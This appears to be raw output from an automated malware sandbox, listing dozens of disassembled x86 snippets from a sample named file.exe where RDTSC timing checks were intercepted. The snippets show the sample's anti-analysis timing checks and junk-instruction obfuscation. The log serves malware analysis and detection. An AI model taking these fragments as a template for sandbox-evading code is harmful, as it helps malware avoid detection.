Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10025AC second address: 1002633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F2F74519258h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D2BADh], esi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F2F74519258h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D2923h], esi 0x0000004b push 00000000h 0x0000004d jmp 00007F2F74519261h 0x00000052 push eax 0x00000053 pushad 0x00000054 pushad 0x00000055 jmp 00007F2F74519265h 0x0000005a pushad 0x0000005b popad 0x0000005c popad 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1003634 second address: 1003639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1003639 second address: 100363F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10027B0 second address: 10027CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jne 00007F2F74D592FCh 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F2F74D592F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10027CE second address: 10027D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10036C9 second address: 10036CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10036CD second address: 10036D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10036D6 second address: 10036DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1004571 second address: 1004578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1004578 second address: 10045B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D59301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F2F74D59307h 0x00000012 jmp 00007F2F74D592FBh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10045B4 second address: 1004608 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2F74519264h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov bl, AEh 0x0000000e mov di, B510h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F2F74519258h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov di, ax 0x00000031 mov ebx, 1B4E294Fh 0x00000036 push 00000000h 0x00000038 mov di, 87EDh 0x0000003c xchg eax, esi 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1004608 second address: 100460C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100476E second address: 1004772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100481A second address: 1004825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1004825 second address: 1004829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100749A second address: 10074E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov bl, dl 0x0000000f sub edi, 50481E9Fh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F2F74D592F8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 adc bh, FFFFFFBEh 0x00000034 push 00000000h 0x00000036 jl 00007F2F74D592F8h 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f jnp 00007F2F74D592F8h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10067B5 second address: 10067C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10067C1 second address: 10067C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1007720 second address: 1007731 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2F74519256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1007731 second address: 100774F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D59306h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100946D second address: 1009471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1009471 second address: 1009477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100A3E1 second address: 100A3E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100A3E7 second address: 100A42C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F2F74D592F8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 or di, 1925h 0x0000002a mov bx, di 0x0000002d push 00000000h 0x0000002f mov edi, esi 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D1EEEh] 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100B741 second address: 100B745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100B745 second address: 100B749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100D42C second address: 100D430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100B749 second address: 100B74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100B74F second address: 100B754 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100C5AD second address: 100C5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100E516 second address: 100E52D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F7451925Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100E52D second address: 100E531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100F4BB second address: 100F4C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100F4C1 second address: 100F589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 jmp 00007F2F74D59308h 0x0000000d pop ebx 0x0000000e nop 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F2F74D592F8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push ebx 0x00000031 jmp 00007F2F74D59302h 0x00000036 pop ebx 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push ebp 0x00000041 call 00007F2F74D592F8h 0x00000046 pop ebp 0x00000047 mov dword ptr [esp+04h], ebp 0x0000004b add dword ptr [esp+04h], 0000001Bh 0x00000053 inc ebp 0x00000054 push ebp 0x00000055 ret 0x00000056 pop ebp 0x00000057 ret 0x00000058 mov eax, dword ptr [ebp+122D0065h] 0x0000005e add dword ptr [ebp+122D1974h], edi 0x00000064 push FFFFFFFFh 0x00000066 jbe 00007F2F74D59303h 0x0000006c call 00007F2F74D592FCh 0x00000071 pop edi 0x00000072 jmp 00007F2F74D592FCh 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F2F74D592FDh 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100F589 second address: 100F58E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100F58E second address: 100F594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1011A5C second address: 1011A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1014A55 second address: 1014A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1014A59 second address: 1014A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1014A5D second address: 1014A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101960B second address: 101960F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1019771 second address: 101978C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2F74D592F6h 0x0000000a jbe 00007F2F74D592F6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101D864 second address: 101D868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1022DB7 second address: 1022DC5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2F74D592F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1022DC5 second address: 1022DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102392B second address: 1023935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023AC4 second address: 1023AF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F2F74519258h 0x0000000f jl 00007F2F7451926Eh 0x00000015 jmp 00007F2F74519268h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023AF3 second address: 1023AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F2F74D592F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023AFD second address: 1023B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023B01 second address: 1023B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023CA6 second address: 1023CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023E4C second address: 1023E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB4710 second address: FB4724 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jnc 00007F2F74519256h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102BDBD second address: 102BDC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102BF1F second address: 102BF42 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jp 00007F2F74519256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F2F74519256h 0x00000014 jmp 00007F2F7451925Fh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102BF42 second address: 102BF5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D59308h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102C67E second address: 102C684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFA9D2 second address: FFA9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFA9D6 second address: FFA9F6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F2F74519267h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102CC77 second address: 102CC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2F74D592FAh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102B96A second address: 102B974 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102B974 second address: 102B97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102B97A second address: 102B984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1036715 second address: 103671B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103671B second address: 1036728 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2F74519256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1036728 second address: 103672E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1035690 second address: 1035696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE21F second address: FFE231 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2F74D592F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F2F74D592F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE73D second address: FFE741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE741 second address: FFE75A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D59305h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE75A second address: FFE760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE760 second address: FFE764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE764 second address: FFE768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE85E second address: FFE868 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2F74D592F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE868 second address: FFE881 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F2F74519256h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e ja 00007F2F74519258h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE881 second address: E41BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 mov di, ax 0x0000000c push dword ptr [ebp+122D15E9h] 0x00000012 sbb edi, 3FC5C434h 0x00000018 call dword ptr [ebp+122D2588h] 0x0000001e pushad 0x0000001f jmp 00007F2F74D59301h 0x00000024 xor eax, eax 0x00000026 jmp 00007F2F74D59304h 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f sub dword ptr [ebp+122D1ADFh], edx 0x00000035 mov dword ptr [ebp+122D3862h], eax 0x0000003b xor dword ptr [ebp+122D1ADFh], edx 0x00000041 mov esi, 0000003Ch 0x00000046 or dword ptr [ebp+122D1ADFh], edx 0x0000004c add esi, dword ptr [esp+24h] 0x00000050 stc 0x00000051 lodsw 0x00000053 mov dword ptr [ebp+122D1ADFh], edi 0x00000059 add eax, dword ptr [esp+24h] 0x0000005d jbe 00007F2F74D592FCh 0x00000063 xor dword ptr [ebp+122D1ADFh], eax 0x00000069 mov ebx, dword ptr [esp+24h] 0x0000006d jno 00007F2F74D592FDh 0x00000073 jnp 00007F2F74D59301h 0x00000079 pushad 0x0000007a mov dword ptr [ebp+122D1ADFh], edi 0x00000080 mov dx, bx 0x00000083 popad 0x00000084 nop 0x00000085 push esi 0x00000086 push eax 0x00000087 push edx 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE8C0 second address: FFE8C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE8C7 second address: FFE8CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE8CD second address: FFE91E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 0130FD7Ch 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F2F74519258h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 call 00007F2F74519259h 0x0000002e jmp 00007F2F7451925Eh 0x00000033 push eax 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 jnp 00007F2F74519256h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE91E second address: FFE93B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F2F74D592FCh 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE93B second address: FFE941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE941 second address: FFE947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFE947 second address: FFE94B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFEAF1 second address: FFEAF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFEDC7 second address: FFEDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFF4DB second address: FFF4DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFF4DF second address: FFF4ED instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2F74519256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFF5CC second address: FFF5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
